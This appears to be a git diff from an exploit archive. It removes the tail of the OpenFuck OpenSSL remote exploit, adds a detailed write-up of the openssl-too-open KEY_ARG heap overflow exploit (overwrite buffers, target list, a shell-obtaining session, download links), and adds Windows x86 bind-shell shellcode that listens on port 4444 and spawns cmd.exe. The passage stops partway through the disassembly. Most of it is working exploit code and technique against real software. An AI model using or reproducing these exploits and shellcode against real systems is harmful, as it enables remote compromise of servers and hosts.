-	if (buf[0] != SSL2_MT_SERVER_FINISHED) {
-		printf("get server finished: Expected SSL2 MT SERVER FINISHED, got %x\n", (int)buf[0]);
-		exit(1);
-	}
-
-	if (len <= 112 /*17*/) {
-		printf("This server is not vulnerable to this attack.\n");
-		exit(1);
-	}
-	cipher = *(int*)&buf[101];
-	ciphers = *(int*)&buf[109];
-	printf("cipher: 0x%x   ciphers: 0x%x\n", cipher, ciphers);
-}
-void get_server_error(ssl_conn* ssl)
-{
-	unsigned char buf[BUFSIZE];
-	int len;
-
-	if ((len = read_ssl_packet(ssl, buf, sizeof(buf))) > 0) {
-		printf("get server finished: Expected SSL2 MT ERROR, got %x\n", (int)buf[0]);
-		exit(1);
-	}
-}
-void usage(char* argv0)
-{
-	int i;
-	printf(": Usage: %s target box [port] [-c N]\n\n", argv0);
-	printf("  target - supported box eg: 0x00\n");
-	printf("  box - hostname or IP address\n");
-	printf("  port - port for ssl connection\n");
-	printf("  -c open N connections. (use range 40-50 if u dont know)\n");
-	printf("  \n\n");
-	printf("  Supported OffSet:\n");
-
-	for (i=0; i<=MAX_ARCH; i++) {
-		printf("\t0x%02x - %s\n", i, architectures[i].desc);
-	}
-	printf("\nFuck to all guys who like use lamah ddos. Read SRC to have no surprise\n");
-
-	exit(1);
-}
-int main(int argc, char* argv[])
-{
-	char* host;
-	int port = 443;
-	int i;
-	int arch;
-	int N = 0;
-	ssl_conn* ssl1;
-	ssl_conn* ssl2;
-
-	printf("\n");
-	printf("*******************************************************************\n");
-	printf("* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *\n");
-	printf("*******************************************************************\n");
-        printf("* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *\n");
-        printf("* #hackarena  irc.brasnet.org                                     *\n");
-	printf("* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *\n");
-	printf("* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *\n");
-	printf("* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *\n");
-	printf("*******************************************************************\n");
-	printf("\n");
-	if ((argc < 3) || (argc > 6))
-		usage(argv[0]);
-	sscanf(argv[1], "0x%x", &arch);
-	if ((arch < 0) || (arch > MAX_ARCH))
-		usage(argv[0]);
-	host = argv[2];
-	if (argc == 4)
-		port = atoi(argv[3]);
-	else if (argc == 5) {
-		if (strcmp(argv[3], "-c"))
-			usage(argv[0]);
-		N = atoi(argv[4]);
-	}
-	else if (argc == 6) {
-		port = atoi(argv[3]);
-		if (strcmp(argv[4], "-c"))
-			usage(argv[0]);
-		N = atoi(argv[5]);
-	}
-	srand(0x31337);
-	for (i=0; i<N; i++) {
-		printf("\rConnection... %d of %d", i+1, N);
-		fflush(stdout);
-		connect_host(host, port);
-		usleep(100000);
-	}
-	if (N) printf("\n");
-	printf("Establishing SSL connection\n");
-	ssl1 = ssl_connect_host(host, port);
-	ssl2 = ssl_connect_host(host, port);
-	send_client_hello(ssl1);
-	get_server_hello(ssl1);
-	send_client_master_key(ssl1, overwrite_session_id_length, sizeof(overwrite_session_id_length)-1);
-	generate_session_keys(ssl1);
-	get_server_verify(ssl1);
-	send_client_finished(ssl1);
-	get_server_finished(ssl1);
-	printf("Ready to send shellcode\n");
-	port = get_local_port(ssl2->sock);
-	overwrite_next_chunk[FINDSCKPORTOFS] = (char) (port & 0xff);
-	overwrite_next_chunk[FINDSCKPORTOFS+1] = (char) ((port >> 8) & 0xff);
-	*(int*)&overwrite_next_chunk[156] = cipher;
-	*(int*)&overwrite_next_chunk[192] = architectures[arch].func_addr - 12;
-	*(int*)&overwrite_next_chunk[196] = ciphers + 16;	/* shellcode address */
-	send_client_hello(ssl2);
-	get_server_hello(ssl2);
-	send_client_master_key(ssl2, overwrite_next_chunk, sizeof(overwrite_next_chunk)-1);
-	generate_session_keys(ssl2);
-	get_server_verify(ssl2);
-	for (i = 0; i < ssl2->conn_id_length; i++) {
-		ssl2->conn_id[i] = (unsigned char) (rand() >> 24);
-	}
-	send_client_finished(ssl2);
-	get_server_error(ssl2);
-	printf("Spawning shell...\n");
-	sleep(1);
-	sh(ssl2->sock);
-	close(ssl2->sock);
-	close(ssl1->sock);
-	return 0;
-}
-/* spabam: It isn't 0day */
-
-
-
diff --git a/platforms/unix/remote/40347.txt b/platforms/unix/remote/40347.txt
new file mode 100755
index 000000000..435903892
--- /dev/null
+++ b/platforms/unix/remote/40347.txt
@@ -0,0 +1,444 @@
+/*
+ * openssl-too-open.c - OpenSSL remote exploit
+ * Spawns a nobody/apache shell on Apache, root on other servers.
+ *
+ * by Solar Eclipse <solareclipse@phreedom.org>
+ *
+ * Thanks to Core, HD Moore, Zillion, Dvorak and Black Berry for their help.
+ *
+ * This code or any derivative versions of it may not be posted to Bugtraq
+ * or anywhere on SecurityFocus, Symantec or any affiliated site.
+ *
+ */
+
+---------[ ./openssl-too-open ]
+
+openssl-too-open is a remote exploit for the KEY_ARG overflow in
+OpenSSL 0.9.6d and older. It will give you a remote shell with the
+priviledges of the server process (nobody when used against Apache,
+root against other servers).
+
+Only Linux/x86 targets are supported.
+
+: openssl-too-open : OpenSSL remote exploit
+  by Solar Eclipse <solareclipse@phreedom.org>
+
+Usage: ./openssl-too-open [options] <host>
+  -a <arch>          target architecture (default is 0x00)
+  -p <port>          SSL port (default is 443)
+  -c <N>             open N apache connections before sending the shellcode (default is 30)
+  -m <N>             maximum number of open connections (default is 50)
+  -v                 verbose mode
+
+Supported architectures:
+	0x00 - Gentoo (apache-1.3.24-r2)
+	0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
+	0x02 - Slackware 7.0 (apache-1.3.26)
+	0x03 - Slackware 8.1-stable (apache-1.3.26)
+	0x04 - RedHat Linux 6.0 (apache-1.3.6-7)
+	0x05 - RedHat Linux 6.1 (apache-1.3.9-4)
+	0x06 - RedHat Linux 6.2 (apache-1.3.12-2)
+	0x07 - RedHat Linux 7.0 (apache-1.3.12-25)
+	0x08 - RedHat Linux 7.1 (apache-1.3.19-5)
+	0x09 - RedHat Linux 7.2 (apache-1.3.20-16)
+	0x0a - Redhat Linux 7.2 (apache-1.3.26 w/PHP)
+	0x0b - RedHat Linux 7.3 (apache-1.3.23-11)
+	0x0c - SuSE Linux 7.0 (apache-1.3.12)
+	0x0d - SuSE Linux 7.1 (apache-1.3.17)
+	0x0e - SuSE Linux 7.2 (apache-1.3.19)
+	0x0f - SuSE Linux 7.3 (apache-1.3.20)
+	0x10 - SuSE Linux 8.0 (apache-1.3.23-137)
+	0x11 - SuSE Linux 8.0 (apache-1.3.23)
+	0x12 - Mandrake Linux 7.1 (apache-1.3.14-2)
+	0x13 - Mandrake Linux 8.0 (apache-1.3.19-3)
+	0x14 - Mandrake Linux 8.1 (apache-1.3.20-3)
+	0x15 - Mandrake Linux 8.2 (apache-1.3.23-4)
+
+Examples: ./openssl-too-open -a 0x01 -v localhost
+          ./openssl-too-open -p 1234 192.168.0.1 -c 40 -m 80
+
+
+---------[ ./openssl-scanner ]
+
+openssl-scanner scans a number of hosts for vulnerable OpenSSL
+implementations. 
+
+: openssl-scanner : OpenSSL vulnerability scanner
+  by Solar Eclipse <solareclipse@phreedom.org>
+
+Usage: ./openssl-scanner [options] <host>
+  -i <inputfile>     file with target hosts
+  -o <outputfile>    output log
+  -a                 append to output log (requires -o)
+  -b                 check for big endian servers
+  -C                 scan the entire class C network the host belogs to
+  -d                 debug mode
+  -w N               connection timeout in seconds
+
+Examples: ./openssl-scanner -d 192.168.0.1
+          ./openssl-scanner -i hosts -o my.log -w 5
+
+
+---------[ Screenshots ]
+
+$ ./openssl-scanner -C 192.168.0.0
+: openssl-scanner : OpenSSL vulnerability scanner
+  by Solar Eclipse <solareclipse@phreedom.org>
+
+Opening 255 connections . . . . . . . . . . done
+Waiting for all connections to finish . . . . . . . . . . . done
+
+192.168.0.136: Vulnerable
+
+
+$ nc 192.168.0.1 80
+HEAD / HTTP/1.0
+
+HTTP/1.1 200 OK
+Date: Tue, 17 Sep 2002 17:47:44 GMT
+Server: Apache-AdvancedExtranetServer/1.3.20 (Mandrake Linux/3mdk) mod_ssl/2.8.4 OpenSSL/0.9.6b
+Connection: close
+Content-Type: text/html
+
+
+./openssl-too-open -a 0x14 192.168.0.1
+: openssl-too-open : OpenSSL remote exploit
+  by Solar Eclipse <solareclipse@phreedom.org>
+
+: Opening 30 connections
+  Establishing SSL connections
+
+: Using the OpenSSL info leak to retrieve the addresses
+  ssl0 : 0x810b3a0
+  ssl1 : 0x810b360
+  ssl2 : 0x810b4e0
+
+* Addresses don't match.
+
+: Opening 40 connections
+  Establishing SSL connections
+
+: Using the OpenSSL info leak to retrieve the addresses
+  ssl0 : 0x8103830
+  ssl1 : 0x80fd668
+  ssl2 : 0x80fd668
+
+* Addresses don't match.
+
+: Opening 50 connections
+  Establishing SSL connections
+
+: Using the OpenSSL info leak to retrieve the addresses
+  ssl0 : 0x8103830
+  ssl1 : 0x8103830
+  ssl2 : 0x8103830
+
+: Sending shellcode
+ciphers: 0x8103830   start_addr: 0x8103770   SHELLCODE_OFS: 184
+  Reading tag
+  Execution of stage1 shellcode succeeded, sending stage2
+  Spawning shell...
+
+bash: no job control in this shell
+bash-2.05$ 
+bash-2.05$ uname -a; id; w;
+Linux localhost.localdomain 2.4.8-26mdk #1 Sun Sep 23 17:06:39 CEST 2001 i686 unknown
+uid=48(apache) gid=48(apache) groups=48(apache)
+  1:49pm  up  4:26,  1 user,  load average: 0.04, 0.07, 0.07
+USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
+bash-2.05$
+
+
+---------[ How Does openssl-too-open Work? ]
+
+It is important to understand the SSL2 handshake in order to successfully
+exploit the KEY_ARG vulnerability. 
+
+---/ Typical SSL2 Handshake
+
+
+        Client           Server
+
+     CLIENT_HELLO -->
+
+                  <-- SERVER_HELLO
+
+CLIENT_MASTER_KEY -->
+
+                  <-- SERVER_VERIFY
+
+  CLIENT_FINISHED -->
+
+                  <-- SERVER_FINISHED
+
+The CLIENT_HELLO message contains a list of the ciphers the client supports,
+a session id and some challenge data. The session id is used if the client
+wishes to reuse an already established session, otherwise it's empty.
+
+The server replies with a SERVER_HELLO message, also listing all supported
+ciphers and includes a certificate with its public RSA key. The server
+also sends a connection id, which will later be used by the client to
+verify that the encryption works.
+
+The client generates a random master key, encrypts it with the server's
+public key and sends it with a CLIENT_MASTER_KEY message. This message
+also specifies the cipher selected by the client and a KEY_ARG field,
+which meaning depends on the specified cipher. For DES-CBC ciphers, the
+KEY_ARG contains the initialization vector.
+
+Now both the client and the server have the master key and they can generate
+the session keys from it. All messages from this point on are encrypted.
+
+The server replies with a SERVER_VERIFY message, containing the challenge
+data from the CLIENT_HELLO message. If the key exchange has been successful,
+the client will be able to decrypt this message and the challenge data returned
+from the server will match the challenge data sent by the client.
+
+The client sends a CLIENT_FINISHED message with a copy of the connection id
+from the SERVER_HELLO packet. It is now the server's turn to decrypt this
+message and check if the connection id returned by the client matches the
+connection it sent by the server.
+
+Finally the server sends a SERVER_FINISHED message, completing the handshake.
+This message contains a session id, generated by the server. If the client
+wishes to reuse the session later, it can send this session id with the
+CLIENT_HELLO message.
+
+
+---/ The KEY_ARG Buffer Overflow
+
+The bug is in ssl/s2_srvr.c, in the get_client_master_key() function. This
+function reads a CLIENT_MASTER_KEY packet and processes it. It reads the
+KEY_ARG_LENGTH value from the client and then copies that many bytes in an
+array of a fixed size.  This array is part of the SSL_SESSION structure.
+If the client specifies a KEY_ARG longer than 8 bytes, the variables in the
+SSL_SESSION structure can be overwritten with user supplied data.
+
+Let's look at the definition of this structure.
+
+typedef struct ssl_session_st
+    {
+    int ssl_version;    /* what ssl version session info is
+                 * being kept in here? */
+
+    /* only really used in SSLv2 */
+    unsigned int key_arg_length;
+    unsigned char key_arg[SSL_MAX_KEY_ARG_LENGTH];
+    int master_key_length;
+    unsigned char master_key[SSL_MAX_MASTER_KEY_LENGTH];
+    /* session_id - valid? */
+    unsigned int session_id_length;
+    unsigned char session_id[SSL_MAX_SSL_SESSION_ID_LENGTH];
+    /* this is used to determine whether the session is being reused in
+     * the appropriate context. It is up to the application to set this,
+     * via SSL_new */
+    unsigned int sid_ctx_length;
+    unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH];
+
+    int not_resumable;
+
+    /* The cert is the certificate used to establish this connection */
+    struct sess_cert_st /* SESS_CERT */ *sess_cert;
+
+    /* This is the cert for the other end.
+     * On clients, it will be the same as sess_cert->peer_key->x509
+     * (the latter is not enough as sess_cert is not retained
+     * in the external representation of sessions, see ssl_asn1.c). */
+    X509 *peer;
+    /* when app_verify_callback accepts a session where the peer's certificate
+     * is not ok, we must remember the error for session reuse: */
+    long verify_result; /* only for servers */
+
+    int references;
+    long timeout;
+    long time;
+
+    int compress_meth;      /* Need to lookup the method */
+
+    SSL_CIPHER *cipher;
+    unsigned long cipher_id;    /* when ASN.1 loaded, this
+                     * needs to be used to load
+                     * the 'cipher' structure */
+
+    STACK_OF(SSL_CIPHER) *ciphers; /* shared ciphers? */
+
+    CRYPTO_EX_DATA ex_data; /* application specific data */
+
+    /* These are used to make removal of session-ids more
+     * efficient and to implement a maximum cache size. */
+    struct ssl_session_st *prev,*next;
+    } SSL_SESSION;
+
+It really looks better with VIM coloring. Anyway, we know the size of the
+structure and it's allocated on the heap. The first thing that comes to
+mind is to overwrite the next malloc chunk and then make the OpenSSL code
+call free() on the SSL_SESSION structure.
+
+After we send a CLIENT_MASTER_KEY message, we'll read a SERVER_VERIFY packet
+from the server and then we'll respond with a CLIENT_FINISHED message.
+The server uses this the contents of this message to verify that the
+key exchange succeeded. If we return a wrong connection id, the server
+will abort the connection and free the SSL_SESSION structure, which is
+exactly what we want.
+
+We'll overwrite the KEY_ARG array with 8 random bytes and the following
+string:
+
+unsigned char overwrite_next_chunk[] =
+    "AAAA"                              /* int master_key_length; */
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"  /* unsigned char master_key[SSL_MAX_MASTER_KEY_LENGTH]; */
+    "AAAA"                              /* unsigned int session_id_length; */
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"  /* unsigned char session_id[SSL_MAX_SSL_SESSION_ID_LENGTH]; */
+    "AAAA"                              /* unsigned int sid_ctx_length; */
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"  /* unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH]; */
+    "AAAA"                              /* unsigned int sid_ctx_length; */
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"  /* unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH]; */
+    "AAAA"                              /* int not_resumable; */
+    "\x00\x00\x00\x00"                  /* struct sess_cert_st *sess_cert; */
+    "\x00\x00\x00\x00"                  /* X509 *peer; */
+    "AAAA"                              /* long verify_result; */
+    "\x01\x00\x00\x00"                  /* int references; */
+    "AAAA"                              /* int timeout; */
+    "AAAA"                              /* int time */  
+    "AAAA"                              /* int compress_meth; */
+    "\x00\x00\x00\x00"                  /* SSL_CIPHER *cipher; */
+    "AAAA"                              /* unsigned long cipher_id; */
+    "\x00\x00\x00\x00"                  /* STACK_OF(SSL_CIPHER) *ciphers; */
+    "\x00\x00\x00\x00\x00\x00\x00\x00"  /* CRYPTO_EX_DATA ex_data; */
+    "AAAAAAAA"                          /* struct ssl_session_st *prev,*next; */
+    "\x00\x00\x00\x00"                  /* Size of previous chunk */
+    "\x11\x00\x00\x00"                  /* Size of chunk, in bytes */
+    "fdfd"                              /* Forward and back pointers */
+    "bkbk"
+    "\x10\x00\x00\x00"                  /* Size of previous chunk */
+    "\x10\x00\x00\x00"                  /* Size of chunk, PREV_INUSE is set */
+
+The "A" bytes don't affect the OpenSSL control flow. The other bytes must be
+set to specific values to make the exploit work. For example, the peer and
+sess_cert pointers must be NULL, because the SSL cleanup code will call
+free() on them before it frees the SSL_SESSION structure.
+
+The free() call will write the value of the bk pointer to the memory
+address in the fd pointer + 12 bytes. We'll put our shellcode address
+in the bk pointer and we'll write it to the free() entry in the GOT
+table.
+
+If you don't understand how freeing this malloc chunk overwrites the GOT
+entry or don't know what the GOT table is, visit juliano's site at
+http://community.core-sdi.com/~juliano/ and read some papers.
+
+
+---/ Getting the Shellcode Address
+
+There is only one little problem. We need a place to put our shellcode
+and we need the exact shellcode address. The trick is to use the
+SERVER_FINISHED message. This message includes the session id, which
+is read from the SSL_SESSION structure. The server reads session_id_length
+bytes from the session_id[] array and sends them to the client. We can
+overwrite the session_id_length variable and complete the handshake.
+If session_id_length is long enough, the SERVER_FINISHED message will
+include the contents of the SSL_SESSION structure.
+
+To get the contents of the session structure, we'll overwrite the
+KEY_ARG array with 8 random bytes and the following string:
+
+unsigned char overwrite_session_id_length[] =
+    "AAAA"                              /* int master_key_length; */
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"  /* unsigned char master_key[SSL_MAX_MASTER_KEY_LENGTH]; */
+    "\x70\x00\x00\x00";                 /* unsigned int session_id_length; */
+
+Now let's imagine the heap state when we send our connection request.
+We have a heap, which contains some allocated chunks of memory and a
+large 'top' chunk, covering all free memory. 
+
+When the server receives the connection, it forks a child and the child
+allocates the SSL_SESSION structure. If there has not been a signifficant
+malloc/free activity, the fragmentation of the memory will be low and the
+new chunk will be allocated from the beginning of the 'top' chunk.
+
+The next allocated chunk is a 16 bytes chunk which holds a
+STACK_OF(SSL_CIPHER) structure. This chunk is also allocated from the
+beginning of the 'top' chunk, so it's located right above the SSL_SESSION
+structure. The address of this chunk is stored in the session->ciphers
+variable.
+
+If we're lucky, the memory would look like this:
+
+                    | top chunk |
+                    |-----------|
+session->ciphers    |  16 bytes |  <- STACK_OF(SSL_CIPHER) structure
+points here      -> |-----------| 
+                    | 368 bytes |  <- SSL_SESSION structure
+                    |-----------|
+
+We can read the session->ciphers pointer from the SSL_SESSION structure
+in the SERVER_FINISHED message. By subtracting 368 from it, we'll get
+the address of the SSL_SESSION structure, and thus the address of
+the data we've overwritten.
+
+
+---/ fork() Is Your Friend
+
+We'll use the same buffer overflow to get the address of the shellcode
+and to overwrite the malloc chunks. The problem is that we need to
+know the shellcode address before we send it to the server.
+
+The only solution is to send 2 requests. The first request overwrites
+session_id_length and we complete the handshake to get the SERVER_FINISHED
+message. Then we adjust our shellcode and open a second connection
+which we use to send it.
+
+If we're dealing with a forking server like Apache, the two children
+will have an identical memory layout and malloc() will put the
+session structure at the same address. Of course, life is never that
+simple. Apache children can handle multiple requests, which would
+change the memory allocation pattern of the two children we use.
+
+To guarantee that both children are freshly spawned, our exploit
+will open a number of connections to the server before sending the
+two important requests. These connection should use up all available
+Apache children and force new ones to be spawned.
+
+If the server traffic is high, the exploit might fail. If the
+memory allocation patterns are different, the exploit might fail.
+If you have a wrong GOT address, the exploit will definitely fail.
+
+
+---------[ How Does openssl-too-open Work? ]
+
+openssl-scanner overflows the master_key_length, master_key[] and session_id_length
+variables in the SSL_SESSION structure. The first two are uninitialized at this point,
+so overwriting them has no effect on openssl. The first place where the session_id_length
+variable is used after we overwrite it is in session_finish() (ssl/s2_srvr.c:847)
+
+memcpy(p,s->session->session_id, (unsigned int)s->session->session_id_length);
+
+This data is returned in the SERVER_FINISHED packet. openssl-scanner checks the length
+of the data. If it matches the value we set session_id_length to, then the server is
+exploitable.
+
+OpenSSL 0.9.6e and higher versions return
+192.160.0.2: Server error: SSL2_PE_UNDEFINED_ERROR (0x00) after KEY_ARG data was sent. Server is not vulnerable.
+
+The updates that most vendors have put out backport the changes from 0.9.6e to 0.9.6b
+or some other version of OpenSSL. They don't return an error like 0.9.6e.
+The updated RedHat and Debian packages) would close the connection immediatelly
+after they receive the oversized KEY_ARG data, causing openssl-scanner to report
+
+192.168.0.1: Connection closed after KEY_ARG data was sent. Server is most likely not vulnerable.
+
+IIS servers exhibit the same behavior.
+
+IIS servers that don't have a certificate set up close the connection as soon as
+they receive the CLIENT_HELLO packet. openssl-scanner reports this as
+
+192.168.0.2: Connection unexpectedly closed
+
+
+/* EOF */
+
+
+
+
+http://www.phreedom.org/solar/exploits/apache-openssl/openssl-too-open.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40347.tar.gz (openssl-too-open.tar.gz)
\ No newline at end of file
diff --git a/platforms/linux/remote/764.c b/platforms/unix/remote/764.c
similarity index 95%
rename from platforms/linux/remote/764.c
rename to platforms/unix/remote/764.c
index bc83a3384..595a9f2b6 100755
--- a/platforms/linux/remote/764.c
+++ b/platforms/unix/remote/764.c
@@ -1,5 +1,5 @@
 /*
- * http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
+ * E-DB Note: Updating OpenFuck Exploit ~ http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
  *
  * OF version r00t VERY PRIV8 spabam
  * Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
diff --git a/platforms/win_x86/shellcode/40352.c b/platforms/win_x86/shellcode/40352.c
new file mode 100755
index 000000000..240ea66f9
--- /dev/null
+++ b/platforms/win_x86/shellcode/40352.c
@@ -0,0 +1,519 @@
+/*
+	# Title : Windows x86 bind shell tcp shellcode
+	# Author : Roziul Hasan Khan Shifat
+	# Date : 08-09-2016
+	# Tested On : Windows 7 Ultimate , Starter x86
+*/
+
+//Note: This shellcode will only works on x86 
+
+/*
+section .text
+	global _start
+_start:
+
+xor ecx,ecx
+mov eax,[fs:ecx+0x30] ;PEB
+mov eax,[eax+0xc] ;PEB.Ldr
+mov esi,[eax+0x14] ;PEB.Ldr->InMemOrderModuleList
+lodsd
+xchg esi,eax
+lodsd
+mov edi,[eax+0x10] ;kernel32.dll base address
+
+
+mov ebx,[edi+0x3c] ;DOS->elf_anew
+add ebx,edi ;PE HEADER
+mov ebx,[ebx+0x78] 
+add ebx,edi ;kernel32 IMAGE_EXPORT_DIRECTORY
+
+
+sub esp,32
+lea esi,[esp]
+
+
+mov cx,660
+
+mov edx,[ebx+0x1c] ;AddressOfFunctions
+add edx,edi
+
+mov eax,[edx+ecx]
+add eax,edi 
+
+mov [esi],dword eax ;CreateProcessA() at offset 0
+
+mov cx,1128
+
+mov eax,[edx+ecx]
+add eax,edi
+
+mov [esi+4],dword eax ;ExitProcess() at offset 4
+
+;------------------------------------
+;finding base address of ws2_32.dll
+
+mov cx,3312
+
+mov eax,[edx+ecx]
+add eax,edi
+
+xor ecx,ecx
+push 0x41416c6c
+mov [esp+2],word cx
+push 0x642e3233
+push 0x5f327377
+
+lea ebx,[esp]
+
+push ebx
+call eax
+
+;---------------------------
+mov edi,eax
+;---------------------
+mov ebx,[edi+0x3c] ;DOS->elf_anew
+add ebx,edi ;PE HEADER
+mov ebx,[ebx+0x78] 
+add ebx,edi ; ws2_32.dll IMAGE_EXPORT_DIRECTORY
+
+mov edx,[ebx+0x1c] ;AddressOfFunctions
+add edx,edi
+
+xor ecx,ecx
+mov cx,456
+
+mov eax,[edx+ecx]
+add eax,edi
+
+mov [esi+8],dword eax ;WSAStartup() at offset 8
+
+mov cx,392
+
+mov eax,[edx+ecx]
+add eax,edi
+
+mov [esi+12],dword eax ;WSASocketA() at offset 12
+
+
+mov eax,[edx+4]
+add eax,edi
+
+mov [esi+16],dword eax ;bind() at offset 16
+
+mov eax,[edx+48]
+add eax,edi
+
+mov [esi+20],dword eax ;listen() at offset 20
+
+mov eax,[edx]
+add eax,edi
+
+mov [esi+24],dword eax ;accept() at offset 24
+
+mov eax,[edx+80]
+add eax,edi
+
+mov [esi+28],dword eax ;setsockopt() at offset 28
+;-------------------------------------------------
+;WSAStartup(514, &WSADATA)
+mov cx,400
+sub esp,ecx
+
+lea ebx,[esp]
+
+mov cx,514
+
+push ebx
+push ecx
+
+call dword [esi+8]
+
+
+;-----------------------------------------
+;WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,NULL,NULL)
+
+xor ecx,ecx
+
+push ecx
+push ecx
+push ecx
+
+mov cl,6
+push ecx
+
+sub ecx,5
+push ecx
+
+inc ecx
+push ecx
+
+call dword [esi+12]
+;----------------------------
+mov edi,eax ;SOCKET
+
+;----------------------------------
+;setsockopt(sock,0xffff,4,&int l=1,int j=2)
+
+cdq
+mov dl,2
+
+push edx
+dec edx
+
+push edx
+lea ecx,[esp]
+
+mov dl,4
+
+push ecx
+push edx
+
+mov dx,0xffff
+push edx
+push edi
+
+call dword [esi+28]
+
+
+;--------------------------------------------
+;bind(SOCKET,(struct sockaddr *)&struct sockaddr_in,16);
+
+cdq
+
+push edx
+push edx
+push edx
+push edx
+
+mov [esp],byte 2
+mov [esp+2],word 0x5c11 ;port 4444
+
+lea ecx,[esp]
+mov dl,16
+
+push edx
+push ecx
+push edi
+
+call dword [esi+16]
+
+;--------------------------------
+;listen(SOCKET,1);
+cdq
+inc edx
+push edx
+push edi
+
+call dword [esi+20]
+;-----------------------------
+;accept(SOCKET,(struct sockaddr *)&struct sockaddr_in,&16);
+
+cdq
+push edx
+push edx
+push edx
+push edx
+mov dl,16
+lea ecx,[esp]
+
+
+
+push edx
+lea ebx,[esp]
+
+push ebx
+push ecx
+push edi
+
+call dword [esi+24]
+;-----------------------
+mov edi,eax ;CLIent socket
+;-----------------------
+
+cdq
+sub esp,16
+lea ebx,[esp] ;PROCESS_INFORMATION
+
+push edi
+push edi
+push edi
+push edx
+
+push edx
+
+mov dl,255
+inc edx
+
+push edx
+cdq
+
+push edx
+push edx
+push edx
+push edx
+push edx
+
+push edx
+push edx
+push edx
+push edx
+push edx
+
+mov dl,68
+push edx
+
+lea ecx,[esp] ;STARTUPINFOA
+
+cdq
+push 0x41657865
+mov [esp+3],byte dl
+push 0x2e646d63 
+
+lea eax,[esp]
+
+;---------------------------------------------
+;CreateProcessA(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&STARTUPINFOA,&PROCESS_INFORMATION)
+
+push ebx
+push ecx
+
+push edx
+push edx
+push edx
+
+inc edx
+push edx
+cdq
+
+push edx
+push edx
+
+push eax
+push edx
+
+call dword [esi]
+;-----------------------
+push eax
+call dword [esi+4]
+
+*/
+
+
+/*
+
+Disassembly of section .text:
+
+00000000 <_start>:
+   0:	31 c9                	xor    %ecx,%ecx
+   2:	64 8b 41 30          	mov    %fs:0x30(%ecx),%eax
+   6:	8b 40 0c             	mov    0xc(%eax),%eax
+   9:	8b 70 14             	mov    0x14(%eax),%esi
+   c:	ad                   	lods   %ds:(%esi),%eax
+   d:	96                   	xchg   %eax,%esi
+   e:	ad                   	lods   %ds:(%esi),%eax
+   f:	8b 78 10             	mov    0x10(%eax),%edi
+  12:	8b 5f 3c             	mov    0x3c(%edi),%ebx
+  15:	01 fb                	add    %edi,%ebx
+  17:	8b 5b 78             	mov    0x78(%ebx),%ebx
+  1a:	01 fb                	add    %edi,%ebx
+  1c:	83 ec 20             	sub    $0x20,%esp
+  1f:	8d 34 24             	lea    (%esp),%esi
+  22:	66 b9 94 02          	mov    $0x294,%cx
+  26:	8b 53 1c             	mov    0x1c(%ebx),%edx
+  29:	01 fa                	add    %edi,%edx
+  2b:	8b 04 0a             	mov    (%edx,%ecx,1),%eax
+  2e:	01 f8                	add    %edi,%eax
+  30:	89 06                	mov    %eax,(%esi)
+  32:	66 b9 68 04          	mov    $0x468,%cx
+  36:	8b 04 0a             	mov    (%edx,%ecx,1),%eax
+  39:	01 f8                	add    %edi,%eax
+  3b:	89 46 04             	mov    %eax,0x4(%esi)
+  3e:	66 b9 f0 0c          	mov    $0xcf0,%cx
+  42:	8b 04 0a             	mov    (%edx,%ecx,1),%eax
+  45:	01 f8                	add    %edi,%eax
+  47:	31 c9                	xor    %ecx,%ecx
+  49:	68 6c 6c 41 41       	push   $0x41416c6c
+  4e:	66 89 4c 24 02       	mov    %cx,0x2(%esp)
+  53:	68 33 32 2e 64       	push   $0x642e3233
+  58:	68 77 73 32 5f       	push   $0x5f327377
+  5d:	8d 1c 24             	lea    (%esp),%ebx
+  60:	53                   	push   %ebx
+  61:	ff d0                	call   *%eax
+  63:	89 c7                	mov    %eax,%edi
+  65:	8b 5f 3c             	mov    0x3c(%edi),%ebx
+  68:	01 fb                	add    %edi,%ebx
+  6a:	8b 5b 78             	mov    0x78(%ebx),%ebx
+  6d:	01 fb                	add    %edi,%ebx
+  6f:	8b 53 1c             	mov    0x1c(%ebx),%edx
+  72:	01 fa                	add    %edi,%edx
+  74:	31 c9                	xor    %ecx,%ecx
+  76:	66 b9 c8 01          	mov    $0x1c8,%cx
+  7a:	8b 04 0a             	mov    (%edx,%ecx,1),%eax
+  7d:	01 f8                	add    %edi,%eax
+  7f:	89 46 08             	mov    %eax,0x8(%esi)
+  82:	66 b9 88 01          	mov    $0x188,%cx
+  86:	8b 04 0a             	mov    (%edx,%ecx,1),%eax
+  89:	01 f8                	add    %edi,%eax
+  8b:	89 46 0c             	mov    %eax,0xc(%esi)
+  8e:	8b 42 04             	mov    0x4(%edx),%eax
+  91:	01 f8                	add    %edi,%eax
+  93:	89 46 10             	mov    %eax,0x10(%esi)
+  96:	8b 42 30             	mov    0x30(%edx),%eax
+  99:	01 f8                	add    %edi,%eax
+  9b:	89 46 14             	mov    %eax,0x14(%esi)
+  9e:	8b 02                	mov    (%edx),%eax
+  a0:	01 f8                	add    %edi,%eax
+  a2:	89 46 18             	mov    %eax,0x18(%esi)
+  a5:	8b 42 50             	mov    0x50(%edx),%eax
+  a8:	01 f8                	add    %edi,%eax
+  aa:	89 46 1c             	mov    %eax,0x1c(%esi)
+  ad:	66 b9 90 01          	mov    $0x190,%cx
+  b1:	29 cc                	sub    %ecx,%esp
